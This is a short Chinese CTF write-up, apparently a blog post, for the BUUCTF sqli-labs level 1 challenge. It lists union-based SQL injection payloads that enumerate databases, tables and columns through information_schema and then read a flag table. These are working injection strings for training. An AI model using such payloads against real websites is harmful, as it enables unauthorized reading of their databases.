BUUCTF sqli-labs 1

这里就是单纯的找一下flag在哪,通关整个靶场在sql注入分区,虽然还没有通关。

这里要先看一下数据库都有哪些,用到语句:?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

发现这个数据库:ctftraining 可能有我们需要的信息

于是接着就是:

查看该数据库中都有什么表:?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),3--+

发现存在flag表,接着就是要看该表的信息:?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'),3--+

发现就只有一列,然后就是查看该列的信息:

这里需要注意,我们要指定是ctftraining数据库的flag表,如果单纯的是flag则是查找的security.flag这时就会报错。

正确语句:?id=-1' union select 1,(select group_concat(flag) from ctftraining.flag),3--+

相关推荐
tmj012 小时前
Sqlmap命令详解
web安全·sqlmap
QQ14220784493 小时前
没有这个数据库账户,难道受到了sql注入式攻击?
数据库·sql
cyhysr4 小时前
sql将表字段不相关的内容关联到一起
数据库·sql
无名-CODING5 小时前
SQL 注入指南
sql·mybatis
科技云报道7 小时前
科技云报到:2026网络安全六大新趋势:AI重构攻防,信任成为新防线
人工智能·科技·web安全
tianyuanwo8 小时前
深入理解iptables:规则管理与匹配机制深度解析
网络·安全·web安全
码农水水9 小时前
小红书Java面试被问:SQL语句的执行过程解析
数据库·sql
youngqqcn10 小时前
SQL中联表查询深入分析
数据库·sql
Java&Develop10 小时前
PL/SQL Developer可视化修改数据
数据库·sql
武昌库里写JAVA10 小时前
vue+iview+node+express实现文件上传,显示上传进度条,实时计算上传速度
java·vue.js·spring boot·后端·sql